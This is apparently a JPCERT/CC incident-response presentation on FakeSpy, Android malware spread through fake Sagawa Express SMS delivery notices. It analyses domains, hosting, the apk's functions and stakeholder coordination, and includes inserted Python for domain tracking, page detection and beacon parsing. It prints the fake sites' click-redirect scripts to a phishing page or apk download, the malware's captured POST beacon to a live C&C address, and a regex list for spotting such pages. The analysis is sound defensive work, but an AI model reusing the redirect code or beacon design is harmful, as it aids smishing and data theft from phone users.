The recent FakeSpy's
activity in Japan
JPCERT Coordination Center
Incident Response Group
Shoko Nakai
Copyright ©2019 JPCERT/CC All rights reserved.
Agenda
FakeSpy observed in Japan
JPCERT/CC’s analysis results
—Domain/IP address
—Phishing contents, apk
—Overview of FakeSpy
JPCERT/CC’s action and future challenges
FakeSpy - introduction -
Information stealing malware targeting Android OS
Spreads via SMS
Trend Micro described it on its blog in June 2018:
—FakeSpy Android Information-Stealing Malware Targets Japanese and Korean-Speaking Users
https://blog.trendmicro.com/trendlabs-security-intelligence/fakespy-android-information-stealing-malware-targets-japanese-and-korean-speaking-users/
JPCERT/CC has been receiving reports since 2018
Cases targeting Android OS
Few previous cases targeting Android OS
—JPCERT/CC has been handling such cases since 2012
[Table: distribution method and apk samples along the 2012–2019 timeline]
Method (in timeline order): 3rd party application store; drive-by download; DNS (spoofing / hijacking); SMS; a period with no information; then DNS (spoofing / hijacking), SMS, etc.
apk samples:
— 2012/10: Info.jigensha.hellopage.apk (Phonebook)
— 2012/12: mailActivity.apk
— 2014/06: sschecker.apk (trojan.banker)
— 2014/08: sijil.apk (androidos_RUSMS)
— 2015/02: 1.apk, 123.apk
— 2016/12: zp.apk
— 2018/01 onwards: sagawa.apk, facebook.apk, koyamato.apk, ocn.apk (FakeSpy)
FakeSpy - beginning -
In early 2018, JPCERT/CC suddenly started receiving many reports of:
—Phishing content purporting to be a specific entity, and apk-hosting websites
—Users being guided to the websites via SMS
FakeSpy - reports -
Number of reports to JPCERT/CC related to FakeSpy
sites (2018/01 – 2019/01)
[Bar chart: reports per month]
Jan-18: 7
Feb-18: 1
Mar-18: 0
Apr-18: 1
May-18: 0
Jun-18: 2
Jul-18: 11
Aug-18: 19
Sep-18: 3
Oct-18: 15
Nov-18: 49
Dec-18: 36
Jan-19: 2
FakeSpy - Victims -
The following companies are targeted:
Sagawa Express: sagawa.apk
Yamato Transport: koyamato.apk
OCN (network provider): ocn.apk
Sagawa Express Case (Ongoing)
Fake websites purporting to be Sagawa Express and
sagawa.apk are still active
Characteristics
—One of the major Japanese transportation companies
—When a package is delivered during recipient’s
absence, the driver will post “Attempted Delivery
Notice”
—Redelivery can be arranged via phone or website
※SMS is NOT used for “Attempted Delivery Notice” or
redelivery arrangement
Fake “Attempted Delivery Notice” SMS
Council of Anti-phishing Japan
https://www.antiphishing.jp/news/alert/sagawa_20180810.html
(Roughly translated) “We attempted to deliver a package to you, but we take it back due to your absence. Please check below:”
phishing and apk
Clicking anywhere on the fake site brings up either phishing content or an apk install page:
[Screenshots: phishing content asking for Apple ID credentials; apk install page with instructions for installing the apk]
Trend Micro security blog
https://blog.trendmicro.co.jp/archives/16787
JPCERT/CC’s analysis results
Collect information on fake sites
Many domains starting with “sagawa-” were used for fake websites. We created a list of possible domains and attempted to resolve them.
Automatically collect fake Sagawa sites:
— Create a list of domain names containing “sagawa”
— Resolve the domain names
— Search WHOIS
— Send HTTP requests to the IP address
— If HTTP response 200 is returned: obtain the phishing content; obtain the apk file (sorted by hash value)
— Store all the records
Tracking sagawa Domain
[Diagram: tracking pipeline, run periodically by cron]
1) Generate domain list (475228+ domains): sagawa-aa.com, sagawa-ab.com, …
2) Resolve and generate IP list: sagawa-xxx.com : 1.xxx.xx.xx, sagawa-xxu.com : 1.xxx.xx.xy, …
3) WHOIS
4) HTTP request / HTTP response
5) Store in Fake-Sagawa-db; export
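As an added example (this is not JPCERT/CC's tool), the Python below sketches the pipeline above with the DNS and HTTP steps injected as functions so that it runs offline against constructed sample data. The enumeration of sagawa-[a-z]{2..4}.com reproduces the 475228 figure on the slide (26^2 + 26^3 + 26^4). All function names, the TEST-NET addresses and the sample responses are assumptions made for the illustration.

```python
# Added example, not JPCERT/CC's tool: a miniature "Tracking sagawa Domain"
# pipeline. DNS and HTTP are injected as callables so it runs offline;
# all names and the sample data below are constructed for the illustration.
import hashlib
import itertools
import string
from typing import Callable, Dict, Iterable, List, Optional, Tuple


def candidate_domains(prefix: str = "sagawa-", tld: str = ".com",
                      min_len: int = 2, max_len: int = 4) -> Iterable[str]:
    """Step 1: enumerate prefix + [a-z]{min_len..max_len} + tld in order.
    With the defaults this is 26^2 + 26^3 + 26^4 = 475228 names, the
    '475228+ domains' figure on the slide."""
    for n in range(min_len, max_len + 1):
        for letters in itertools.product(string.ascii_lowercase, repeat=n):
            yield f"{prefix}{''.join(letters)}{tld}"


def candidate_count(min_len: int = 2, max_len: int = 4) -> int:
    """Size of the list candidate_domains() would produce."""
    return sum(26 ** n for n in range(min_len, max_len + 1))


# resolve(domain) -> IP, or None when the name does not resolve
Resolver = Callable[[str], Optional[str]]
# fetch(ip, domain) -> (status, headers, body), or None on timeout
Fetcher = Callable[[str, str], Optional[Tuple[int, Dict[str, str], bytes]]]


def track(domains: Iterable[str], resolve: Resolver, fetch: Fetcher) -> Dict[str, object]:
    """Steps 2-5: resolve, request, record, and keep apk files by SHA-256."""
    records: List[Dict[str, object]] = []
    apks: Dict[str, bytes] = {}          # sha256 -> file content (deduplicated)
    for domain in domains:
        ip = resolve(domain)
        if ip is None:
            continue                     # not registered / not resolvable
        rec: Dict[str, object] = {"domain": domain, "ip": ip, "status": "timeout"}
        resp = fetch(ip, domain)
        if resp is not None:
            status, headers, body = resp
            rec["status"] = status
            rec["server"] = headers.get("Server", "")
            if status == 200:
                if body.startswith(b"PK"):   # apk files are zip containers
                    digest = hashlib.sha256(body).hexdigest()
                    apks.setdefault(digest, body)
                    rec["apk_sha256"] = digest
                else:
                    rec["html"] = body.decode("utf-8", "replace")
        records.append(rec)
    return {
        "records": records,
        "resolvable": len(records),
        "ips": sorted({str(r["ip"]) for r in records}),
        "apk_hashes": sorted(apks),
    }


# --- constructed sample data: TEST-NET addresses, not real infrastructure ---
SAMPLE_DNS = {
    "sagawa-aa.com": "192.0.2.10", "sagawa-ab.com": "192.0.2.10",
    "sagawa-ac.com": "192.0.2.11", "sagawa-zz.com": "192.0.2.12",
}
FAKE_APK = b"PK\x03\x04" + b"constructed-sample-apk"
SAMPLE_HTTP = {
    "192.0.2.10": (200, {"Server": "Apache-Coyote/1.1"}, FAKE_APK),
    "192.0.2.11": (200, {"Server": "Apache-Coyote/1.1"}, b'<body onclick="kk();">(snip)</body>'),
    # no entry for 192.0.2.12: the fetcher returns None, i.e. a timeout
}


def sample_run() -> Dict[str, object]:
    """Run the pipeline over sagawa-[a-z]{2}.com against the sample tables."""
    return track(candidate_domains(max_len=2), SAMPLE_DNS.get,
                 lambda ip, domain: SAMPLE_HTTP.get(ip))


if __name__ == "__main__":
    print("candidates:", candidate_count())
    result = sample_run()
    print("resolvable:", result["resolvable"], "ips:", result["ips"])
    print("apk hashes:", result["apk_hashes"])
```

Two apk downloads from different domains on the same host collapse to one hash, which is the "sort by hash value" step: the number of distinct files (80 on a later slide) is what matters, not the number of domains serving them.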
Results (on Jan 31, 2019)
Domains that were resolvable: 940 domains
Associated IP address: 171 IP addresses
Resolved domains: sagawa-[a-z]{#}.com ?
sagawa-aae.com sagawa-abo.com sagawa-aia.com sagawa-aod.com sagawa-aw.com sagawa-yaya.com
sagawa-aai.com sagawa-abu.com sagawa-aiai.com sagawa-app.com sagawa-awe.com sagawa-yi.com
sagawa-aaka.com sagawa-achi.com sagawa-ai.com sagawa-ara.com sagawa-awi.com sagawa-ynu.com
sagawa-aak.com sagawa-ada.com sagawa-aka.com sagawa-ar.com sagawa-awo.com sagawa-yo.com
sagawa-aake.com sagawa-ad.com sagawa-ak.com sagawa-are.com sagawa-aya.com sagawa-yryr.com
sagawa-aaki.com sagawa-ade.com sagawa-ake.com sagawa-ari.com sagawa-ay.com sagawa-ytqq.com
sagawa-aako.com sagawa-adi.com sagawa-aki.com sagawa-aro.com sagawa-ayo.com sagawa-ytqw.com
sagawa-aaku.com sagawa-ado.com sagawa-ako.com sagawa-aru.com sagawa-ayu.com sagawa-zaa.com
sagawa-aao.com sagawa-adu.com sagawa-aku.com sagawa-asa.com sagawa-aza.com sagawa-za.com
sagawa-aasa.com sagawa-ae.com sagawa-ama.com sagawa-as.com sagawa-az.com sagawa-zae.com
sagawa-aas.com sagawa-afu.com sagawa-am.com sagawa-ase.com sagawa-aze.com sagawa-zai.com
sagawa-aase.com sagawa-aga.com sagawa-ame.com sagawa-ashi.com sagawa-azi.com sagawa-zaka.com
sagawa-aashi.com sagawa-ag.com sagawa-ami.com sagawa-aso.com sagawa-azo.com sagawa-zak.com
sagawa-aaso.com sagawa-age.com sagawa-amo.com sagawa-asu.com sagawa-azu.com sagawa-zao.com
sagawa-aasu.com sagawa-agi.com sagawa-amu.com sagawa-aswe.com sagawa-baa.com sagawa-zau.com
sagawa-aata.com sagawa-ago.com sagawa-ana.com sagawa-ata.com
(snip)
sagawa-zc.com
sagawa-aat.com sagawa-agu.com sagawa-an.com sagawa-at.com sagawa-ze.com
sagawa-aau.com sagawa-aha.com sagawa-ane.com sagawa-ate.com sagawa-xixi.com sagawa-zo.com
sagawa-aba.com sagawa-ah.com sagawa-ani.com sagawa-ato.com sagawa-xx.com sagawa-zu.com
sagawa-ab.com sagawa-ahe.com sagawa-ano.com sagawa-atsu.com sagawa-yaa.com sagawa-zv.com
sagawa-abe.com sagawa-ahi.com sagawa-anu.com sagawa-au.com sagawa-ya.com sagawa-zx.com
sagawa-abi.com sagawa-aho.com sagawa-ao.com sagawa-awa.com sagawa-yau.com sagawa-zz.com
Registered Domains [2018 ~]
When the domains were purchased and from whom
[Chart: domains registered per day, 2018-06-23 to 2019-01-24, by registrar]
Registrars in the legend: Bizcn.com, Inc.; Chengdu West Dimension Digital Technology Co., Ltd.; GoDaddy.com, LLC; PDR Ltd. d/b/a PublicDomainRegistry.com; Xinnet Technology Corporation
Domain price (as of Dec 2018)
Chengdu West Dimension Digital Technology Co.: .com domain price (per year) 35 CNY ($5.2 USD)
Xinnet Technology Corporation: .com domain price (per year) 25 CNY ($3.7 USD). With promotion?
Domains used for the campaign
Mostly provided by Chinese registrars
Attackers seem to be shifting towards registrars that offer cheaper prices
However, no free domains seem to be used.
—(Hypothetically) Purchased domains may survive longer than free domains
Resolved IP addresses
Almost all active malware/phishing sites were hosted on HiNet
[Chart: ratio of network service providers of IP addresses associated with fake sagawa domains (n=171)]
HiNet (94%); other providers in the legend: CHOOPALLC-AP, GO-DADDY-COM-LLC, HINET-NET, IDNIC-BIZNETGIO-ID, LVLT-ORG-4-8
Other pie-chart labels on the slide: HINET 81%; timeout 78%; 200 14%
[Chart: IP address breakdown by HiNet CIDR (n=171), /16 ranges in the order shown]
61.230.0.0/16, 61.228.0.0/16, 61.231.0.0/16, 114.43.0.0/16, 1.162.0.0/16, 1.169.0.0/16, 111.240.0.0/16, 1.160.0.0/16, 118.160.0.0/16, 1.171.0.0/16, 1.172.0.0/16, 36.226.0.0/16, 1.173.0.0/16, 118.165.0.0/16, 118.163.0.0/16, 1.175.0.0/16, 36.225.0.0/16, 118.169.0.0/16, 61.227.0.0/16, 114.36.0.0/16, 1.161.0.0/16, 36.236.0.0/16, 60.251.0.0/16, 220.136.0.0/16
Sample Response
Checked what was running on the IP addresses associated with fake domains
—4 hosts were picked as a sample [Dec 11, 2018 3PM GMT+9]
‘Device Admin Panel’ was accessible
—Possibly compromised and remotely controlled
HTTP response:
Server: Apache-Coyote/1.1
All fake sites include “Apache-Coyote/1.1” in their Server header
IP address
Network range of a Taiwanese ISP “HiNet”
Multiple IP addresses are used in the attack infrastructure
Phishing content and apk files may be served from compromised hosts
—A common web server software was found on them
Source code (redirecting to a phishing site)
Redirect script to a phishing site
—Users are redirected to pp.html when clicking anywhere on the site

function kk(){
    //alert("The express delivery app will be downloaded; please install it after the download.");
    window.location.href = "./pp.html";
}
(snip)
</head>
<body onclick="kk();">
(snip)
Source code (redirecting to an apk install page) 1
Code to check User-Agent and install apk
var pc_style = ""
var browser = {
    versions: function () {
        var u = navigator.userAgent, app = navigator.appVersion;
        return {
            trident: u.indexOf('Trident') > -1,
            presto: u.indexOf('Presto') > -1,
            webKit: u.indexOf('AppleWebKit') > -1,
            gecko: u.indexOf('Gecko') > -1 && u.indexOf('KHTML') == -1,
            mobile: !!u.match(/AppleWebKit.*Mobile.*/) || !!u.match(/AppleWebKit/) && u.indexOf('QIHU') && u.indexOf('QIHU') > -1 && u.indexOf('Chrome') < 0,
            ios: !!u.match(/\(i[^;]+;( U;)? CPU.+Mac OS X/),
            android: u.indexOf('Android') > -1 || u.indexOf('Linux') > -1,
            iPhone: u.indexOf('iPhone') > -1 || u.indexOf('Mac') > -1,
            iPad: u.indexOf('iPad') > -1,
            webApp: u.indexOf('Safari') == -1,
            ua: u
        };
    }(),
    language: (navigator.browserLanguage || navigator.language).toLowerCase()
}
if (browser.versions.mobile && !browser.versions.android) {
    this.location = "http[:]//sagawa-[MASKED][.]com/";
}
Source code (redirecting to an apk install page) 2
Install apk when anything on the page is clicked (without checking the User-Agent)
Various patterns of source code for installing the apk on the device were confirmed

function kk(){
    //alert("The express delivery app will be downloaded; please install it after the download.");
    window.location.href = "./sagawa.apk";
}
(snip)
</head>
<body onclick="kk();">
(snip)
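As an added example (not from the slides or JPCERT/CC), the Python below scores a fetched page against the patterns shown in the two source-code slides: a click-anywhere <body onclick> handler, a location assignment to an .apk or to a local .html page, the mobile-but-not-Android branch, and the Apache-Coyote Server banner noted on the Sample Response slide. Indicator names, the regular expressions and the sample pages are constructed for this illustration.

```python
# Added example, not from the slides: score a fetched page against the
# fake-site patterns shown above. Indicator names, regexes and the sample
# pages are constructed for this illustration.
import re
from typing import Dict, List, Tuple

INDICATORS: List[Tuple[str, re.Pattern]] = [
    # <body onclick="kk();">: any click on the page triggers the redirect
    ("click_anywhere_handler",
     re.compile(r"<body[^>]*\bonclick\s*=", re.I)),
    # window.location.href = "./sagawa.apk": the click leads straight to an apk
    ("location_to_apk",
     re.compile(r"location(?:\.href)?\s*=\s*[\"'][^\"']*\.apk[\"']", re.I)),
    # window.location.href = "./pp.html": the click leads to the phishing page
    ("location_to_local_page",
     re.compile(r"location(?:\.href)?\s*=\s*[\"']\./[^\"']+\.html[\"']", re.I)),
    # browser.versions.mobile && !browser.versions.android: non-Android phones sent elsewhere
    ("mobile_non_android_branch",
     re.compile(r"versions\.mobile\s*&&\s*!\s*browser\.versions\.android")),
]


def score_page(headers: Dict[str, str], body: str) -> Dict[str, object]:
    """Return the indicator names that fire, plus an overall verdict."""
    hits = [name for name, rx in INDICATORS if rx.search(body)]
    # The Server banner was common to every fake site seen, but a banner
    # alone is weak evidence: many legitimate Tomcat deployments send it.
    if headers.get("Server", "").startswith("Apache-Coyote/"):
        hits.append("apache_coyote_banner")
    suspicious = any(h != "apache_coyote_banner" for h in hits)
    return {"hits": hits, "suspicious": suspicious}


# --- constructed sample pages modelled on the snippets from the slides ---
SAMPLE_HEADERS = {"Server": "Apache-Coyote/1.1"}
APK_REDIRECT_PAGE = """<html><head><script>
function kk(){ window.location.href = "./sagawa.apk"; }
</script></head><body onclick="kk();">(snip)</body></html>"""
PHISHING_REDIRECT_PAGE = """<html><head><script>
function kk(){ window.location.href = "./pp.html"; }
</script></head><body onclick="kk();">(snip)</body></html>"""
UA_BRANCH_PAGE = """<script>
if (browser.versions.mobile && !browser.versions.android) {
    this.location = "http[:]//sagawa-[MASKED][.]com/";
}
</script>"""
BENIGN_PAGE = "<html><head><title>Parcel tracking</title></head><body><p>Hello</p></body></html>"

if __name__ == "__main__":
    for label, page in [("apk", APK_REDIRECT_PAGE), ("phish", PHISHING_REDIRECT_PAGE),
                        ("ua", UA_BRANCH_PAGE), ("benign", BENIGN_PAGE)]:
        print(label, score_page(SAMPLE_HEADERS, page))
```

Such a check belongs in the HTTP-response step of the tracking pipeline: a 200 response whose body fires one of the content indicators is worth archiving and reporting, whereas the banner by itself only corroborates.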
apk file
Obtained apk files
—Duration: 2018/12/5 – 2019/01/31
—Files obtained: 80
Hash values (listed on the slide)
apk file analysis
It contains code that attempts to POST information from the infected device:

POST //servlet/xx HTTP/1.1
User-Agent: Fiddler
Content-Type: application/json
User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; sdk Build/KK)
Host: 125.227.174.32
Connection: Keep-Alive
Accept-Encoding: gzip
Content-Length: 129

{"json":"{\"npki\":\"1\",\"provider\":\"\",\"bank\":\"\",\"machine\":\"sdk\",\"sversion\":\"4.4.2\",\"mobile\":\"15555215554\"}"}
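Added example (not JPCERT/CC's code): parsing the captured beacon. The body is JSON whose "json" member is itself a JSON document serialized as a string, so it has to be decoded twice, and the Content-Length check (129 bytes) is a cheap way to confirm a transcript was copied intact. The transcript is reconstructed from the slide with the proxy-injected Fiddler header left out; the function names are assumptions.

```python
# Added example, not JPCERT/CC's code: parse the captured POST beacon.
# The transcript below is reconstructed from the slide (the proxy-injected
# "User-Agent: Fiddler" line is left out); function names are assumptions.
import json
from typing import Dict, Tuple

RAW_REQUEST = (
    "POST //servlet/xx HTTP/1.1\r\n"
    "Content-Type: application/json\r\n"
    "User-Agent: Dalvik/1.6.0 (Linux; U; Android 4.4.2; sdk Build/KK)\r\n"
    "Host: 125.227.174.32\r\n"
    "Connection: Keep-Alive\r\n"
    "Accept-Encoding: gzip\r\n"
    "Content-Length: 129\r\n"
    "\r\n"
    r'{"json":"{\"npki\":\"1\",\"provider\":\"\",\"bank\":\"\",'
    r'\"machine\":\"sdk\",\"sversion\":\"4.4.2\",\"mobile\":\"15555215554\"}"}'
)


def split_request(raw: str) -> Tuple[str, Dict[str, str], str]:
    """Split a raw HTTP/1.1 request into request line, headers and body."""
    head, _, body = raw.partition("\r\n\r\n")
    lines = head.split("\r\n")
    headers: Dict[str, str] = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers, body


def parse_beacon(raw: str) -> Dict[str, object]:
    """Decode the double-encoded beacon body into its fields."""
    request_line, headers, body = split_request(raw)
    method, path, _ = request_line.split(" ", 2)
    declared = int(headers.get("content-length", "0"))
    actual = len(body.encode("utf-8"))
    if declared != actual:
        raise ValueError(f"Content-Length {declared} but body is {actual} bytes")
    outer = json.loads(body)            # first decode: {"json": "<string>"}
    device = json.loads(outer["json"])  # second decode: the string is itself JSON
    return {
        "method": method,
        "path": path,
        "host": headers.get("host", ""),
        "user_agent": headers.get("user-agent", ""),
        "device": device,
    }


if __name__ == "__main__":
    info = parse_beacon(RAW_REQUEST)
    print(info["method"], info["path"], "->", info["host"])
    for key, value in info["device"].items():
        print(f"  {key}: {value!r}")
```

The "machine": "sdk", "sversion": "4.4.2" and 1555521555x phone number identify an Android emulator, which is what one expects from a sandbox capture; on a real victim these fields carry the handset model, OS version and phone number the C&C uses to identify the device.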
Destination hosts
The hosts the apk was communicating with:
—125.227.174.32
—125.227.0.22
WHOIS information:
inetnum: 125.224.0.0 - 125.231.255.255
netname: HINET-NET
descr: Data Communication Business Group,
descr: Chunghwa Telecom Co.,Ltd.
(snip)
apk functions
Analyzed sample: sagawa.apk [Analysis period: 2018/12/26]
MD5 3657739fedf62d852242fe7169be3f57
SHA1 45848866d2f8d36baf0c03c8e8ed79624c756c6c
SHA256 71c59c898b3d7d191bd285ebe6788460b9e276aca433d4d10e0eade85430f42a
Contents sent from the infected device:
— Serial number
— Applications installed
— Device model (e.g. Android SDK built for x86)
— OS version
— SQLite data (id, type, protocol, address, body)
Commands sent from the C&C server in return:
— Cause the infected device to send SMS to contacts saved in the infected phone
— In some cases, a new C&C server address is specified in the command to switch the communication route
FakeSpy’s Whole Picture
Attack infrastructure
Component
✓ SMS
✓ Fake domain
✓ Servers hosting phishing contents and apk file
✓ Server controlling apk files (C&C server)
Stakeholders
—Mobile network operator
—Internet service provider
—Domain registrar etc.
Relations of FakeSpy(sagawa.apk) stakeholders
[Diagram: relations of FakeSpy (sagawa.apk) stakeholders]
— Mobile network provider: SMS (sender number, SMS contents) carrying the link http://sagawa-[a-z]{#}.com
— Registrars (Chengdu West, Xinnet): fake domains Sagawa-[a-z]{2}.com (Sagawa-ab.com, Sagawa-ac.com, … Sagawa-aj.com) and Sagawa-[a-z]{3}.com (Sagawa-gab.com, Sagawa-gac.com, … Sagawa-gaj.com)
— DNS server (mostly hosted in China); illustrative entries on the slide: Sawaga-a.com 111.222.333.444, Sawaga-b.com 222.333.444.555, Sawaga-c.com 333.444.555.666
— ISP HiNet (Taiwan): compromised hosts serving sagawa.apk, and the C&C
— Victim device (OS: Android)
JPCERT/CC’s action and future challenges
JPCERT/CC’s action
Coordination with the entities administering the hosts/networks used as part of the attack infrastructure
1. Domain registrars: requested registrars to suspend the fake domains
2. Internet service providers: requested the admins of web servers hosting phishing content and apk files to suspend them
3. Law enforcement agency, CSIRT: provided information on the C&C server to the Taiwanese law enforcement agency and national CSIRT
JPCERT/CC has coordinated with the colored parties
[Diagram: the stakeholder diagram from the previous slide, with the parties JPCERT/CC has coordinated with shown in color]
Other things we have done
Besides the coordination with domain registrars, network operators etc.:
—Provided the fake site information to browser vendors so that they can warn users when the fake sites are accessed
—Shared the IoC information with security vendors so that they can reflect it in their products
The blank parts are still left…
—What can we do about them?
Mobile network providers
[Diagram: the mobile network provider portion of the stakeholder diagram: SMS (sender number, SMS contents) → http://sagawa-[a-z]{#}.com → sagawa.apk on compromised hosts (HiNet, Taiwan) → Android device → C&C]
Challenges - Mobile network providers -
Current situation
Previously, fake apks were distributed through 3rd party application stores, emails or websites. However, in recent cases, route hijacking (through networks compromised via misconfigured routers) and SMS are the most common means.
Challenge
Network devices can be replaced or re-configured, but what measures are there against SMS spam? We would like to hear what measures mobile network providers can take against malicious SMS spam.
Domain registrar (Registrant)
[Diagram: the registrar portion of the stakeholder diagram: Sagawa-[a-z]{2}.com and Sagawa-[a-z]{3}.com domains registered via Chengdu West and Xinnet, DNS servers mostly hosted in China, resolving to compromised hosts and the C&C on HiNet (Taiwan)]
Challenges – Domain registrar (Registrant)
Current situation
Attackers tend to use domain registrars that offer cheaper prices
Challenge
Do domain registrars have any measures to screen registrants or any criteria to identify malicious domain registrations? (e.g. use of domains that look like an existing service)
We hope to discuss with domain registrars how to prevent fake domains from being registered by attackers.
Thank you!
JPCERT Coordination Center
Report Incidents
— Email: info@jpcert.or.jp
— https://www.jpcert.or.jp/english/ir/form.html
